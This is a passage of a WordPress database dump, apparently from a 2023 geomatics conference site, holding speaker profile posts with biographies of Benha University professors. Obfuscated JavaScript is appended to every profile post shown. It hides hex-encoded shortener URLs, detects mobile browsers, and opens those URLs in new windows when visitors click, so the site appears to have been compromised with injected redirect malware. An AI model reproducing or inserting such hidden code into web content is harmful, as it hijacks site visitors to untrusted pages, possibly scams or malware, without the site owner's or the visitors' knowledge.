wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong><em>Prof. Dr. Gomaa Mohamed Dawod</em></strong>','','publish','closed','closed','','prof-dr-gomaa-mohamed-dawod','','','2023-01-14 20:51:32','2023-01-14 20:51:32','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3583',0,'dt_team','',0),
(3584,1,'2023-01-14 20:50:36','2023-01-14 20:50:36','','loc4','','inherit','open','closed','','loc4','','','2023-01-14 20:50:36','2023-01-14 20:50:36','',3583,'https://gsw2023.com/wp-content/uploads/2023/01/loc4.jpg',0,'attachment','image/jpeg',0),
(3585,1,'2023-01-14 20:54:57','2023-01-14 20:54:57','<!-- wp:cover {\"overlayColor\":\"accent\"} -->\n<div class=\"wp-block-cover\"><span aria-hidden=\"true\" class=\"wp-block-cover__background has-accent-background-color has-background-dim-100 has-background-dim\"></span><div class=\"wp-block-cover__inner-container\"><!-- wp:paragraph {\"align\":\"center\",\"placeholder\":\"Write title…\",\"fontSize\":\"large\"} -->\n<p class=\"has-text-align-center has-large-font-size\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:table -->\n<figure class=\"wp-block-table\"><table><tbody><tr><td>Ayman Rashad Elshehaby<br>Dean, faculty of engineering at Shoubra, Benha university<br>Prof. of photogrammetry and surveying at Geomatics department.<br>Ayman.elshehaby@feng.bu.edu.eg<br> <br>Since 1989 the experience has been gained in many different fields of Surveying (Cadastral, Topographic, Geometrical Geodesy, Satellite imagery, Remote Sensing, GIS, Computer, Computer programming). The academic experience has been gained through the university under &amp; post-graduate courses teaching, and through many technical published papers. The practical experience has been gained through the field projects of different aspects. The managerial administrative and decision making skills has been gained from the managerial posts.</td></tr></tbody></table></figure>\n<!-- /wp:table --></div></div>\n<!-- /wp:cover -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Dr. Ayman Rashad Elshehaby','','publish','closed','closed','','prof-dr-ayman-rashad-elshehaby','','','2023-01-14 20:55:00','2023-01-14 20:55:00','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3585',0,'dt_team','',0),
(3586,1,'2023-01-14 20:53:59','2023-01-14 20:53:59','','loc5','','inherit','open','closed','','loc5','','','2023-01-14 20:53:59','2023-01-14 20:53:59','',3585,'https://gsw2023.com/wp-content/uploads/2023/01/loc5.jpg',0,'attachment','image/jpeg',0),
(3587,1,'2023-01-14 20:59:19','2023-01-14 20:59:19','<!-- wp:cover {\"overlayColor\":\"accent\"} -->\n<div class=\"wp-block-cover\"><span aria-hidden=\"true\" class=\"wp-block-cover__background has-accent-background-color has-background-dim-100 has-background-dim\"></span><div class=\"wp-block-cover__inner-container\"><!-- wp:paragraph {\"align\":\"center\",\"placeholder\":\"Write title…\",\"fontSize\":\"large\"} -->\n<p class=\"has-text-align-center has-large-font-size\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:table -->\n<figure class=\"wp-block-table\"><table><tbody><tr><td><strong>Prof. Mahmoud Salah</strong><br><strong>mahmoud.goma@feng.bu.edu.eg</strong><br><strong> </strong><br><strong> </strong><br>Prof. Mahmoud Salah graduated from Benha University with a BSc in Surveying Engineering in 1999, MSc in 2004, and PhD under joint supervision from the School of Surveying and Spatial Information Systems, The University of New South Wales (UNSW), Sydney, Australia. He was employed at the department of Geomatics Engineering at Benha University since 2001, progressing to the position of Professor in 2022 and Head of the department of Geomatics engineering from 2022-uptodate. Mahmoud has undertaken research at UNSW, specializing in a range of topics in spatial information, and has published more than 60 scientific papers in journals and conference proceedings.</td></tr></tbody></table></figure>\n<!-- /wp:table --></div></div>\n<!-- /wp:cover -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g 